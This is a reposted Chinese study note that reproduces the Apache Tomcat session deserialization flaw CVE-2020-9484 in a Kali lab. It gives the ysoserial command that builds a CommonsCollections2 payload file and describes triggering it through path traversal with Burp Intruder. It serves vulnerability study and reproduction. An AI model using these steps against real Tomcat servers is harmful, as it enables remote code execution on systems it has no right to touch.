码上快乐

相关内容   简体   繁体

Apache #Tomcat CVE-2020-9484

本文转载自  查看原文  2020-06-22 08:29  1056    学习笔记

CVE-2020-9484

用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞 CVE-2020-9484

环境:

  1. Kali 2.0
  2. apache-tomcat-7.0.61-CVE-2020-9484.tar.gz(webapp是s2-053,在其lib下加了commons-collections4-4.0.jar)

启动

/yourtomcatdir/bin/startup.sh 

 

 

生成payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session

利用

先访问S2-053看是否启动正常: http://192.168.152.128:8080/s2-053/ 

 

 


重新访问抓包,用intruder进行路径遍历 

 

 


 

 

 

执行命令成功: 

https://github.com/IdealDreamLast/CVE-2020-9484/raw/master/img/ok.png

本文转自https://github.com/IdealDreamLast/CVE-2020-9484/


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 CVE-2020-9484 Apache Tomcat反序列化漏洞浅析 CVE-2020-9484 tomcat session反序列化漏洞分析与复现 [Vulfocus解题系列]Apache Tomcat 反序列化代码执行漏洞复现(CVE-2020-9484)_一次失败的漏洞复现 Apache Tomcat Ajp CVE-2020-1938漏洞复现 CVE-2020-1938 Apache-Tomcat-Ajp漏洞复现 CVE-2020-1938 Apache Tomcat AJP文件包含漏洞 Apache Tomcat 文件包含漏洞 (CVE-2020-1938) 复现 Apache Tomcat 文件包含漏洞(CVE-2020-1938) CVE-2020-1938:Apache-Tomcat-Ajp漏洞-复现 CVE-2020-1938 Apache-Tomcat-Ajp漏洞复现
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM